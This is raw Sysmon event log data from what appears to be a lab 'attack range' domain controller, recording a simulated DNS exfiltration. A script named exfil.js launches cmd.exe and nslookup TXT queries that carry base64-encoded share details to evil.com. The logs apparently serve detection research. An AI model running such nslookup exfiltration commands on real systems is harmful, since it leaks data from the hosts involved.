14:21:34.281{2E1864BB-18EE-629A-0544-000000005F02}69604204C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-0744-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.291{2E1864BB-18EE-629A-0744-000000005F02}2900C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-0544-000000005F02}6960C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzge.tmp 2>&1 10341000x8000000000000000209879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.276{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0644-000000005F02}5584C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.275{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0644-000000005F02}5584C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.259{2E1864BB-18EE-629A-0644-000000005F02}55841044C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0544-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.259{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0644-000000005F02}5584C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.244{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.244{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.244{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.244{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.244{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0544-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.244{2E1864BB-18E0-629A-6742-000000005F02}3976660C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-0544-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.254{2E1864BB-18EE-629A-0544-000000005F02}6960C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzge.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.244{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmdl.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.228{2E1864BB-18EE-629A-0344-000000005F02}71928016C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0444-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.228{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0444-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.228{2E1864BB-18EE-629A-0244-000000005F02}57042200C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-0444-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.229{2E1864BB-18EE-629A-0444-000000005F02}6932C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-0244-000000005F02}5704C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmdl.tmp 2>&1 10341000x8000000000000000209859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.212{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0344-000000005F02}7192C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.212{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0344-000000005F02}7192C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.198{2E1864BB-18EE-629A-0344-000000005F02}71928016C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0244-000000005F02}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.181{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0344-000000005F02}7192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.181{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0244-000000005F02}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.181{2E1864BB-18E0-629A-6742-000000005F02}39762860C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-0244-000000005F02}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 